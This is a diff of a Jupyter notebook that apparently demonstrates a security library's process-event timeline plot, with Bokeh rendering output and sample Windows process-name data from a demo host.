exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\"],\"TimeGenerated\":{\"__ndarray__\":\"AHB09v6EdkIAUHv2/oR2QgBAf/b+hHZCABCA9v6EdkIAAIP2/oR2QgDghPb+hHZCAPCF9v6EdkIAQIn2/oR2QgDgifb+hHZCAICK9v6EdkIAMI32/oR2QgBQkPb+hHZCAHCT9v6EdkIAUJT2/oR2QgAAl/b+hHZCAPCZ9v6EdkIAcJz2/oR2QgAgn/b+hHZCANCh9v6EdkIAcKb2/oR2QgDAqfb+hHZCAFCt9v6EdkIAcLD2/oR2QgAQsfb+hHZCABBB8/6EdkIA8Ezz/oR2QgCQTfP+hHZCAOBV8/6EdkIAIFfz/oR2QgDwXPP+hHZCANBd8/6EdkIAYHHz/oR2QgAwo/T+hHZCALAc9f6EdkIAsB31/oR2QgAwH/X+hHZCAKAg9f6EdkIAECL1/oR2QgBgPfX+hHZCAMBB9f6EdkIAMEf1/oR2QgBQS/X+hHZCAFBQ9f6EdkIAEFP1/oR2QgAQWPX+hHZCACCq9f6EdkIAEK31/oR2QgDQsfX+hHZCAMC09f6EdkIAULn1/oR2QgBAvPX+hHZCAHDA9f6EdkIAkMP1/oR2QgDwx/X+hHZCANDK9f6EdkIA0M71/oR2QgDw0fX+hHZCABDW9f6EdkIAMNn1/oR2QgAw3fX+hHZCABDg9f6EdkIAsOT1/oR2QgBwYfX+hHZCAJBl9f6EdkIAsGz1/oR2QgAwcPX+hHZCADB09f6EdkIAsHf1/oR2QgAAevX+hHZCAHB69f6EdkIAcHr1/oR2QgAQhfX+hHZCAJCI9f6EdkIAwIz1/oR2QgAQkPX+hHZCACCW9f6EdkIA4Jn1/oR2QgBAnvX+hHZCAPCk9f6EdkIAgDX2/oR2QgDwNvb+hHZCABA69v6EdkIAMD32/oR2QgBQP/b+hHZCAABH9v6EdkIAEEj2/oR2QgCwSfb+hHZCAMBK9v6EdkIAAEz2/oR2QgDQTPb+hHZCABBO9v6EdkIAIE/2/oR2QgBAUvb+hHZCANBV9v6EdkIA8Fj2/oR2QgAQXPb+hHZCADBf9v6EdkIAgGL2/oR2QgAwZfb+hHZCAOBm9v6EdkIA8Gf2/oR2QgBAa/b+hHZCADBu9v6EdkIAUHH2/oR2QgAQtvb+hHZCAEC29v6EdkIAkLj2/oR2QgAwv/b+hHZCACDC9v6EdkIAEMX2/oR2QgBQx/b+hHZCAADJ9v6EdkIAIMz2/oR2QgDAzPb+hHZCACDR9v6EdkIAAOz2/oR2QgAw8Pb+hHZCAGD19v6EdkIA8Pj2/oR2QgDA+fb+hHZCAAD79v6EdkIAEPz2/oR2QgAwAPf+hHZCACAD9/6EdkIAQAb3/oR2QgAwCff+hHZCAJAJ9/6EdkIAYA73/oR2QgDgEPf+hHZCADAT9/6EdkIAIBf3/oR2QgBAGvf+hHZCADAd9/6EdkIAUCD3/oR2QgBwI/f+hHZCACAm9/6EdkIAQCn3/oR2QgBwLff+hHZCAMAw9/6EdkIAcDP3/oR2QgCQOvf+hHZCALA+9/6EdkIAcEH3/oR2QgAgRPf+hHZCABBH9/6EdkIA8En3/oR2QgAQTPf+hHZCABDv9f6EdkIAQPP1/oR2QgDQ9vX+hHZCADD79f6EdkIAUP/1/oR2QgCQBPb+hHZCAFAJ9v6EdkIA0Av2/oR2QgAwEPb+hHZCAFAT9v6EdkIAABX2/oR2QgBQGPb+hHZCACAd9v6EdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[160]},\"index\":[46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,76,77,78,79,80,81,82,85,89,90,91,92,93,94,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,221,222,223,224,225,226,227,230,231,232,233,234,235],\"y_index\":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]},\"selected\":{\"id\":\"1394\"},\"selection_policy\":{\"id\":\"1395\"}},\"id\":\"1299\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#FDE724\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1377\",\"type\":\"Scatter\"}],\"root_ids\":[\"1383\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"33565bc6-ab96-43ca-8262-3e6b1568dca2\",\"root_ids\":[\"1383\"],\"roots\":{\"1383\":\"db4824c4-17c4-4154-a05b-2641ad064898\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1383"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "display_timeline(\r\n",
+    "    processes_on_host,\r\n",
+    "    group_by=\"Account\",\r\n",
+    "    source_columns=[\"NewProcessName\", \"ParentProcessName\"],\r\n",
+    "    legend=\"left\",\r\n",
+    ");"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-13T22:11:03.673091Z",
+     "start_time": "2019-09-13T22:11:03.668096Z"
+    }
+   },
+   "source": [
+    "We can use the group_by parameter to specify a column on which to split individually plotted series.\n",
+    "\n",
+    "Specifying a legend, we can see the value of each series group. The legend is interactive - click on a series name to\n",
+    "hide/show the data. The legend can be placed inside of the chart (`legend=\"inline\"`) or to the left or right.\n",
+    "\n",
+    "Alternatively we can enable the yaxis - although this is not guaranteed to show all values of the groups.\n",
+    "\n",
+    "**Note**: \n",
+    "- the tooltips work on the Windows process data shown above because of a legacy fallback built into the code. Usually you need to specify the `source_columns` parameter explicitly to have the hover tooltips populated correctly.\n",
+    "- the trailing semicolon just stops Jupyter showing the return value from the function. It isn't mandatory"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-01-30T20:46:29.162793Z",
+     "start_time": "2020-01-30T20:46:29.052843Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1618\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1618\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1618\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"b43aeb46-036c-457f-a385-398814a9197c\" data-root-id=\"1700\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"2dfcb07c-0e43-4298-812b-a88e5063a3b2\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1622\"},{\"id\":\"1654\"}]},\"id\":\"1700\",\"type\":\"Column\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#FDE724\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1696\",\"type\":\"Scatter\"},{\"attributes\":{\"source\":{\"id\":\"1620\"}},\"id\":\"1699\",\"type\":\"CDSView\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1722\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1703\",\"type\":\"AllLabels\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1697\",\"type\":\"Scatter\"},{\"attributes\":{\"data_source\":{\"id\":\"1620\"},\"glyph\":{\"id\":\"1696\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1697\"},\"view\":{\"id\":\"1699\"}},\"id\":\"1698\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1705\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1706\",\"type\":\"AllLabels\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1724\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1723\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1637\"},\"dimension\":1,\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1640\",\"type\":\"Grid\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1725\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1728\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"1726\",\"type\":\"YearsTicker\"},{\"attributes\":{},\"id\":\"1629\",\"type\":\"LinearScale\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":\"10px\"},\"id\":\"1670\",\"type\":\"Title\"},{\"attributes\":{\"end\":1547530487011.5,\"start\":1547525104998.5},\"id\":\"1657\",\"type\":\"Range1d\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1731\",\"type\":\"DaysTicker\"},{\"attributes\":{\"end\":1547530280011.0,\"start\":1547525311999.0},\"id\":\"1625\",\"type\":\"Range1d\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1729\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1730\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"text\":\"Event Timeline\"},\"id\":\"1623\",\"type\":\"Title\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1732\",\"type\":\"DaysTicker\"},{\"attributes\":{\"end\":1.5,\"start\":-0.5},\"id\":\"1627\",\"type\":\"Range1d\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1735\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"1684\"},\"x_range\":{\"id\":\"1625\"},\"y_range\":null},\"id\":\"1683\",\"type\":\"RangeTool\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"tooltips\":[[\"NewProcessName\",\"@NewProcessName\"],[\"ParentProcessName\",\"@ParentProcessName\"],[\"TimeGenerated\",\"@TimeGenerated{%F %T.%3N}\"]]},\"id\":\"1621\",\"type\":\"HoverTool\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1733\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1734\",\"type\":\"DaysTicker\"},{\"attributes\":{\"below\":[{\"id\":\"1633\"}],\"center\":[{\"id\":\"1636\"},{\"id\":\"1640\"}],\"height\":300,\"left\":[{\"id\":\"1637\"}],\"min_border_left\":50,\"renderers\":[{\"id\":\"1693\"},{\"id\":\"1698\"}],\"title\":{\"id\":\"1623\"},\"toolbar\":{\"id\":\"1647\"},\"width\":900,\"x_range\":{\"id\":\"1625\"},\"x_scale\":{\"id\":\"1629\"},\"y_range\":{\"id\":\"1627\"},\"y_scale\":{\"id\":\"1631\"}},\"id\":\"1622\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"below\":[{\"id\":\"1665\"},{\"id\":\"1670\"}],\"center\":[{\"id\":\"1668\"}],\"height\":120,\"renderers\":[{\"id\":\"1676\"},{\"id\":\"1681\"}],\"title\":{\"id\":\"1655\"},\"toolbar\":{\"id\":\"1669\"},\"toolbar_location\":null,\"width\":900,\"x_range\":{\"id\":\"1657\"},\"x_scale\":{\"id\":\"1661\"},\"y_range\":{\"id\":\"1659\"},\"y_scale\":{\"id\":\"1663\"}},\"id\":\"1654\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1736\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"1655\",\"type\":\"Title\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"1688\"},\"major_label_policy\":{\"id\":\"1706\"},\"ticker\":{\"id\":\"1634\"}},\"id\":\"1633\",\"type\":\"DatetimeAxis\"},{\"attributes\":{},\"id\":\"1708\",\"type\":\"AllLabels\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1737\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"1715\"},{\"id\":\"1716\"},{\"id\":\"1717\"},{\"id\":\"1718\"},{\"id\":\"1719\"},{\"id\":\"1720\"},{\"id\":\"1721\"},{\"id\":\"1722\"},{\"id\":\"1723\"},{\"id\":\"1724\"},{\"id\":\"1725\"},{\"id\":\"1726\"}]},\"id\":\"1634\",\"type\":\"DatetimeTicker\"},{\"attributes\":{},\"id\":\"1631\",\"type\":\"LinearScale\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1738\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1633\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1636\",\"type\":\"Grid\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1645\",\"type\":\"PanTool\"},{\"attributes\":{\"formatter\":{\"id\":\"1705\"},\"major_label_overrides\":{\"0\":\"MSTICAlertsWin1\\\\MSTICAdmin\",\"1\":\"WORKGROUP\\\\MSTICAlertsWin1$\"},\"major_label_policy\":{\"id\":\"1703\"},\"ticker\":{\"id\":\"1638\"}},\"id\":\"1637\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1739\",\"type\":\"YearsTicker\"},{\"attributes\":{},\"id\":\"1638\",\"type\":\"BasicTicker\"},{\"attributes\":{\"formatter\":{\"id\":\"1671\"},\"major_label_policy\":{\"id\":\"1708\"},\"ticker\":{\"id\":\"1666\"}},\"id\":\"1665\",\"type\":\"DatetimeAxis\"},{\"attributes\":{},\"id\":\"1661\",\"type\":\"LinearScale\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"1728\"},{\"id\":\"1729\"},{\"id\":\"1730\"},{\"id\":\"1731\"},{\"id\":\"1732\"},{\"id\":\"1733\"},{\"id\":\"1734\"},{\"id\":\"1735\"},{\"id\":\"1736\"},{\"id\":\"1737\"},{\"id\":\"1738\"},{\"id\":\"1739\"}]},\"id\":\"1666\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"data\":{\"NewProcessName\":[\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cm